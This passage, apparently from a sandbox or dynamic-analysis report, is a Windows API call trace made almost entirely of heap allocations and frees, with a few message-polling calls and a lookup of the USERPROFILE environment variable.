Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.355] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f98 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0208.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0208.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0208.357] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.357] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0208.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a749e8 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0208.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0208.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0208.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.360] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0208.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0208.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0208.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0208.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0208.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0208.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0208.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0208.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0208.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 